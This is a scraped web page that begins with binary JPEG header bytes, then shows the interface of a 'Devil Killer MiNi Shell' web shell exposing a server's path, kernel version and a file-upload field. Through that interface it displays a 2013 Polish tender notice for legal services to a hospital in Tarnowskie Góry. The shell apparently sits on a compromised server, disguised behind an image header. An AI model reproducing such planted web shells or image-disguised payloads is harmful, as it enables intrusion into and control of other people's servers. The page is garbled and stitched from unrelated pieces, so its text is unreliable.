JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130320/111670-N-2013.html

<p class="kh_header"><b>Tarnowskie Góry: Kompleksowa obsługa prawna Wielospecjalistycznego Szpitala Powiatowego S.A. z siedzibą w Tarnowskich Górach</b><br>
<b>Numer ogłoszenia: 111670 - 2013; data zamieszczenia: 20.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa prawna Wielospecjalistycznego Szpitala Powiatowego S.A. z siedzibą w Tarnowskich Górach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Obsługa prawna obejmuje w szczególności
stałe doradztwo prawne dla wszystkich komórek organizacyjnych Zamawiającego,
opinie, porady, analizy prawne, wyjaśnienia i interpretacje przepisów z zakresu prawa pracy, prawa cywilnego, prawa handlowego, prawa podatkowego, prawa administracyjnego, prawa zamówień publicznych, prawa ubezpieczeniowego, prawa z zakresu ochrony zdrowia i inne - udzielane w formie pisemnej bądź ustnej, pocztą elektroniczną i telefonicznie - w terminie do 7 dni, a w sprawach szczególnie pilnych - na bieżąco, chyba że w niniejszym załączniku wskazano w szczególnym przypadku inny termin,
opracowanie i opiniowanie wewnętrznych aktów prawnych takich jak np. statut, regulaminy, zarządzenia, itp. dla potrzeb Zamawiającego - pod względem redakcyjnym, formalnoprawnym i merytorycznym,
sporządzanie umów zgodnie z potrzebami Zamawiającego po uzyskaniu niezbędnych informacji merytorycznych z właściwej komórki,
opiniowanie i doradztwo prawne w zakresie projektów i zawartych wcześniej umów,
kontraktów, ugód przedsądowych, porozumień zawieranych z kontrahentami, NFZ, umów o badania kliniczne, itp., także w zakresie oceny kwestii należytego wywiązywania się z umowy,
współpraca w kwestii ustalania wzorów umów lub zatwierdzania umów niestandardowych z Główną Księgową,
zapewnienie obsługi prawnej przy zawieraniu wszystkich umów i opiniowanie wszystkich umów pod względem formalno-prawnym, potwierdzone parafą radcy prawnego,
na etapie zawierania umów na podstawie wcześniejszego projektu - zapewnienie poprawności formalnej sporządzenia umowy w tym: poprawność komparycji - sposób reprezentacji Wykonawcy i Zamawiającego, zapisy w przypadku, gdy stroną są wykonawcy występujący wspólnie, daty rozpoczęcia i zakończenia umowy,
analizowanie pod kątem poprawności formalno-prawnej i przedkładanie Zarządowi WSP S.A. propozycji rozstrzygnięć w zakresie inicjowanych przez kierowników działów Zamawiającego lub podmioty zewnętrzne - zmian do obowiązujących umów lub kwestii ich ewentualnego wcześniejszego zakończenia, przygotowywanie stosownych aneksów,
przechowywanie oryginałów wszystkich umów zawieranych przez Zamawiającego
wraz z wszystkimi do nich aneksami, z wyjątkiem umów o pracę, kontraktu z Narodowym Funduszem Zdrowia, umów o świadczenie usług medycznych, ewentualnie innych wskazanych przez Zamawiającego,
prowadzenie Centralnego Rejestru Umów, o których mowa w punkcie 10 w formie pisemnej i elektronicznej, zawierającego informacje o zawartych przez Zamawiającego umowach wraz z wszystkimi do nich aneksami, w zakresie danych ustalonym z Zamawiającym po zawarciu umowy,
 udostępnianie informacji publicznej zgodnie z zarządzeniem obowiązującym w tym zakresie u Zamawiającego w tym: prowadzenie rejestru wniosków i odpowiedzi,
uczestniczenie w prowadzonych przez Zamawiającego negocjacjach, rokowaniach, których celem jest powstanie, zmiana bądź rozwiązanie stosunku prawnego,
reprezentacja prawna Zamawiającego wobec podmiotów zewnętrznych, w tym w sprawach związanych z realizacją umów o udzielenie świadczeń zdrowotnych zawartych z NFZ,
występowanie w charakterze pełnomocnika Zamawiającego w postępowaniach sądowych, administracyjnych, przed Krajową Izbą Odwoławczą oraz przed innymi organami orzekającymi,
zachowanie terminów koniecznych np. do złożenia apelacji bądź wystąpienia o uzasadnienie wyroku do sądu,
opiniowanie na wniosek Zamawiającego treści korespondencji Zamawiającego z organami administracji publicznej, sądami i innymi instytucjami oraz osobami prawnymi i fizycznymi,
w przypadku sporu z podmiotem zewnętrznym dotyczącego w szczególności interpretacji zawartej umowy, warunków gwarancji jakości, zasadności nałożenia kar umownych - obowiązek prowadzenia korespondencji z ww. podmiotem w porozumieniu z działem, którego dany problem dotyczy,
w momencie uzyskania z działu, którego dany problem dotyczy, informacji o braku pokrycia przez kontrahenta naliczonej kary- przedłożenie całości dokumentacji Zarządowi, w celu podjęcia decyzji o dalszym postępowaniu w danej sprawie; w zależności od decyzji - podjęcie stosownych działań; informowanie działu, którego dany problem dotyczy o przebiegu i wyniku sprawy,
udzielanie pomocy prawnej w zakresie obsługi Rady Nadzorczej i Walnego Zgromadzenia,
 prowadzenie rejestru spraw bieżących związanych z obsługą Zamawiającego oraz spraw sądowych i administracyjnych np. w formie dzienników korespondencyjnych,
monitorowanie procesu legislacyjnego w zakresie dotyczącym Zamawiającego i bieżące informowanie o zmianach przepisów prawnych mających wpływ na funkcjonowanie Zamawiającego oraz bieżąca aktualizacja istniejących wykazów aktów prawnych w ramach obowiązujących u Zamawiającego procedur Systemu Zarządzania Jakością, a także przekazywanie na bieżąco informacji prawnej o wprowadzonych przez ustawodawcę zmianach  komórkom merytorycznym,
 bieżące monitorowanie interpretacji przepisów prawnych i informowanie komórek, których zmiany dotyczą,
 prowadzenie macierzy powiązań pomiędzy aktami prawnymi, a regulacjami wewnętrznymi Zamawiającego, 
współudział w opracowywaniu planu strategicznego Zamawiającego w zakresie analizy prawnej,
wydawanie na wniosek kierowników działów Zamawiającego opinii w zakresie dokumentów dopuszczających dany asortyment do obrotu, stosowania, używania, itp.,
 doradztwo prawne z zakresu stosowania ustawy - Prawo Zamówień Publicznych oraz aktów wykonawczych do ww. ustawy, uczestnictwo w prowadzonych postępowaniach, realizacja zadań objętych zarządzeniem wewnętrznym Zamawiającego w sprawie zasad udzielania
zamówień; a w szczególności:
opiniowanie i parafowanie specyfikacji istotnych warunków zamówienia - w terminie do 7 dni od otrzymania, w przypadku postępowań standardowych - w terminie 3 dni od otrzymania,
opracowanie i aktualizowanie na bieżąco oraz przekazywanie Zamawiającemu do stosowania wzorów najczęściej stosowanych umów;
 sporządzanie i parafowanie projektów oraz ostatecznych wersji zawieranych umów na potrzeby procedur zamówień publicznych,
 opracowywanie odpowiedzi na zapytania wykonawców w procedurze udzielania
zamówienia - dotyczące projektów umów i pozostałe - w zakresie formalno- prawnym,
ocena poprawności wniesienia wadium i zabezpieczenia należytego wykonania umowy w formie innej niż pieniężna,
 przygotowywanie opinii dotyczących ewentualnego wykluczenia wykonawcy z postępowania
o udzielenie zamówienia publicznego art. 24 PZP, przekazywanie do Działu Zamówień Publicznych informacji o wykluczeniu wraz z dokumentami i informacjami stanowiącymi podstawę do zawiadomienia Prezesa Urzędu Zamówień Publicznych, przechowywanie dokumentacji dotyczącej wyrządzenia szkody,
wydawanie na wniosek kierownika danego działu Zamawiającego opinii w przypadku podejrzenia w stosunku do wykonawcy o stosowanie rażąco niskiej ceny, oświadczenia nieprawdy stwierdzenie czy mamy do czynienia z takim przypadkiem oraz podjęcie kroków będących konsekwencją takiego czynu,
 opracowywanie korespondencji związanej z odwołaniami i uczestnictwo w rozprawach przed Krajową Izbą Odwoławczą,
 opiniowanie, na wniosek kierownika danego działu Zamawiającego, wyboru trybu
udzielania zamówienia publicznego,
 wydawanie opinii w zakresie interpretacji zapisów ustawy - Prawo zamówień publicznych i aktów wykonawczych do niej,
 doradztwo w zakresie problematyki związanej z pozyskiwaniem funduszy unijnych,
 sporządzanie miesięcznych sprawozdań i zestawień dla Zarządu Zamawiającego o przebiegu, etapie i spodziewanych rezultatach toczących się spraw z powództwa Zamawiającego oraz dla których Zamawiający jest stroną pozwaną; raport ten winien być przedstawiony w formie pisemnej w terminie do 15 danego miesiąca za miesiąc poprzedni i omówiony przez radcę prawnego na żądanie Zarządu,
 informowanie wraz z uzasadnieniem niezwłocznie po powzięciu takiej informacji - Zarządu Zamawiającego o wyrokach i postanowieniach w sprawach, których stroną jest Zamawiający, które zapadły w postępowaniach przed sądem, organami administracji publicznej, itp.; informacja ta w formie pisemnej, wyrok, jego uzasadnienie, itp. dokumenty winny wpłynąć również do kancelarii Zamawiającego,
 sporządzanie miesięcznych sprawozdań dla Działu Finansowo-Księgowego o przebiegu i etapie toczących się spraw z powództwa Zamawiającego dotyczących windykacji należności z tytułu niezapłaconych faktur; raport ten winien być przedstawiony w formie pisemnej w terminie do 15 danego miesiąca za miesiąc poprzedni i przekazany Głównemu Księgowemu,
 przejęcie przez Wykonawcę będących w toku postępowań przed sądami powszechnymi oraz organami administracji publicznej,
pomoc przy udzielaniu wyjaśnień wobec podmiotów kontrolujących w trakcie i po zakończeniu kontroli zamawiającego przez podmioty do tego upoważnione,
 przygotowywanie pełnomocnictw dla pracowników szpitala i osób występujących po stronie Wykonawcy - stosownie do okoliczności, informowanie z wyprzedzeniem Działu Finansowo- Księgowego o konieczności dokonywania stosownych opłat,
wykonywanie innych prac z zakresu obsługi prawnej wynikających z bieżącej działalności Zamawiającego.

Wykonawca musi zapewnić obecność radcy prawnego lub aplikanta w siedzibie zamawiającego minimum 3 razy w tygodniu w dniach i godzinach ustalonych pomiędzy zamawiającym a wykonawcą przed zawarciem umowy nie dopuszcza się harmonogramu, w którym obecność planowana jest na trzy kolejne dni danego tygodnia, w czasie nie mniejszym
niż 12 godzin tygodniowo, w godzinach pracy zamawiającego.
Uwaga: W przypadku wykonywania zamówienia przy pomocy aplikanta, co najmniej raz w tygodniu musi być zapewniona obecność radcy prawnego.
Wymagania wobec osób pełniących funkcję radcy prawnego:
uprawnienia radcy prawnego - wpis na listę radców prawnych prowadzoną
przez Okręgową Izbę Radców Prawnych lub na listę adwokatów prowadzoną
przez Okręgową Radę Adwokacką;
co najmniej dwuletnie doświadczenie w wykonywaniu zawodu radcy prawnego oraz co najmniej roczne doświadczenie w obsłudze szpitala funkcjonującego w formie spółki kapitałowej lub samodzielnego publicznego zakładu opieki zdrowotnej, dla którego jedynym wspólnikiem, akcjonariuszem lub podmiotem tworzącym jest jednostka samorządu terytorialnego.
Wymagania wobec osoby pełniącej funkcję aplikanta:
mgr prawa z co najmniej rocznym stażem jako aplikant radcowski lub adwokacki.

Zamawiający zastrzega sobie prawo do konsultacji telefonicznych i elektronicznych w godzinach poza ustalonymi harmonogramem, w przypadkach niecierpiących zwłoki. W harmonogramie należy wskazać nazwiska osób, które będą pełnić wszystkie opisane w niniejszym załączniku funkcje wraz z numerami telefonów kontaktowych do nich.

Wykonawca powinien dysponować programem prawniczym typu Lex, Legalis
lub równoważnym, zapewniającym ciągły dostęp do aktualnej bazy aktów prawnych.

W razie braku możliwości obecności osoby wykonującej obsługę prawną w ustalonym z Zamawiającym czasie, np. z powodu odbywającej się rozprawy sądowej lub z innego uzasadnionego powodu, konieczne będzie wcześniejsze uzgodnienie odstępstwa od harmonogramu z Zamawiającym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5, 79.11.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [F] do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykonał, albo w przypadku świadczeń okresowych lub ciągłych wykonuje usługę  - minimum 1 usługa o wartości nie mniejszej niż 200 000,00zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [F] do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia, tj. osobą która posiada uprawnienia, wydane zgodnie z wymogami ustawy z dnia 6 lipca 1982 r. o radcach prawnych (art. 23 ustawy z dnia 6 lipca 1982 r. - tekst jednolity: Dz. U. z 2010 r. Nr 10, poz. 65 z pózn. zm.) albo ustawy z dnia 26 maja 1982 r. Prawo o adwokaturze (art. 65 ustawy z dnia 26 maja 1982 r. - tekst jednolity: Dz. U. z 2009 r. Nr 146 poz. 1188 z późn. zm.) - radca prawny wpisany na listę radców prawnych prowadzoną przez Okręgową Izbę Radców Prawnych lub na listę adwokatów prowadzoną przez Okręgową Radę Adwokacką, z co najmniej dwuletnim doświadczeniem w wykonywaniu zawodu radcy prawnego oraz co najmniej rocznym doświadczeniem w obsłudze szpitala funkcjonującego w formie spółki kapitałowej lub samodzielnego publicznego zakładu opieki zdrowotnej, dla którego jedynym wspólnikiem/akcjonariuszem lub podmiotem tworzącym jest jednostka samorządu terytorialnego,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożyć oświadczenie według załącznika nr [F] do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony szczegółowo formularz oferty - część [B]. 
2. Podpisany (zatwierdzony) opis przedmiotu zamówienia - część [C]. 
3. Podpisany (zatwierdzony) sposób realizacji zamówienia - część [D].
4. Wzór oświadczeń - część [F].
5. Wzór oświadczeń - część [G].
6. Wykaz osób - część [H].
7. Wykaz usług - część [I].</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 20</li>
<li>3 - Doświadczenie - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wg projektu umowy
8. Ceną obowiązującą jest cena brutto, która nie może ulec zmianie, za wyjątkiem sytuacji, gdy dojdzie do zmiany powszechnie obowiązujących w Rzeczypospolitej Polskiej przepisów o podatku VAT w trakcie obowiązywania umowy. W takim przypadku obowiązująca pozostaje cena netto powiększona o należny podatek VAT.
9. Wykonawca w razie zajścia okoliczności, o której mowa w pkt. 8 jest zobowiązany do przedłożenia Zamawiającemu odpowiednich dokumentów uzasadniających zmianę ceny. W przypadku zmiany stawki podatku VAT w ramach niniejszej umowy (zgodnie z pkt. 8) zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę, pod warunkiem przesłania przez Wykonawcę aneksu w tej sprawie (określającego nową cenę jednostkową) z 7-dniowym wyprzedzeniem w stosunku do daty wejścia w życie przedmiotowej zmiany
Zamawiający dopuszcza zmiany osób wykonujących poszczególne funkcje (w stosunku do informacji zawartych w ofercie) - za zgodą Zamawiającego z uzasadnionych powodów, pod warunkiem, że zmiana ta nie naruszy wymagań postawionych w stosunku do osoby pełniącej daną funkcję. Zgoda Zamawiającego nie jest konieczna w przypadku zastępstwa na rozprawach sądowych w sytuacjach nagłych.
Strony przewidują możliwość dokonania zmiany umowy w przypadku, gdy Wykonawca zaoferuje niższą cenę, lub zmiana taka będzie korzystna dla Zamawiającego.
Wszelkie zmiany umowy wymagają zgody obu stron w formie pisemnej, pod rygorem nieważności tych zmian.
Zamawiający przewiduje możliwość dokonania innych zmian umowy, które nie są sprzeczne
z treścią oferty wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Dziale zamówień publicznych - budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2013 godzina 10:30, miejsce: w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Sekretariacie - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





